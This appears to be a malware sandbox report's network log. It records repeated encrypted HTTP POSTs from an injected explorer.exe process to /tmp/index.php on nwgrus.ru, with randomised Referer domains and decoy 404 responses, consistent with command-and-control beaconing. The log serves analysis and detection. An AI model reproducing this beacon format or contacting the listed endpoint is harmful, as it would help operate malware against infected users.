                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.449745190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:33.475970984 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://wcoutespihad.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 326
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:33.475996971 CEST326OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 56 a0 a5
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu*VDlu-mDYt4n0#iRS5LM6,;$79VIZ6u@f)Q_(igsU_c~d9I}
                                                                                                                            Oct 3, 2024 02:52:34.564838886 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:34 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.449746190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:34.603136063 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://pmsjsfqrqyrxj.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 219
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:34.603157997 CEST219OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4c 0d a6 a9
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuLZ{`j1rp0V+qnaOg_9USG4P!R|kLnEi)T5c) U@b+n|
                                                                                                                            Oct 3, 2024 02:52:35.755268097 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:35 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.449747190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:35.808037996 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://etwlmvbptmw.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 192
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:35.808073997 CEST192OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 62 2d ef 9d
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vub-]hJ,k;|o+D8vc-no_!%iSC1ce*T8
                                                                                                                            Oct 3, 2024 02:52:36.896193981 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:36 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.449748190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:36.914623976 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://hytemqketckrb.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 114
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:36.914649010 CEST114OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 62 53 d0 ed
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vubSEEbu9y@Hm=
                                                                                                                            Oct 3, 2024 02:52:38.024081945 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:37 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.449749190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:38.037350893 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://mgmthbbcemjcwdac.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 315
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:38.037350893 CEST315OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2c 52 cc 83
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu,RzBn_dHp/=+iF1gEP<KX8JKGto597(p#.hT^Leltk&+MqeUeQ]g
                                                                                                                            Oct 3, 2024 02:52:39.123039961 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:38 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.449750190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:39.136965990 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://mclmeggoidfw.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 220
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:39.136965990 CEST220OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 54 2b cc a3
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuT+Y]|uKy5M-tso {7yf";!@D'Vhs?4 jM8 s)"VF/@6~&
                                                                                                                            Oct 3, 2024 02:52:41.272486925 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:40 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                            Oct 3, 2024 02:52:41.272905111 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:40 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                            Oct 3, 2024 02:52:41.273628950 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:40 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.449751190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:41.280611038 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://ywnrujdiubrl.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 133
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:41.280636072 CEST133OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 25 40 af 96
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu%@=WHufYSep(5JpVj
                                                                                                                            Oct 3, 2024 02:52:42.376409054 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:42 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.449752190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:42.392420053 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://llaskwsfjjpffj.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 141
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:42.392446995 CEST141OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5c 3f e5 bc
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu\?\rCZcIX)'1OI*)^5I$lm
                                                                                                                            Oct 3, 2024 02:52:43.552974939 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:43 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
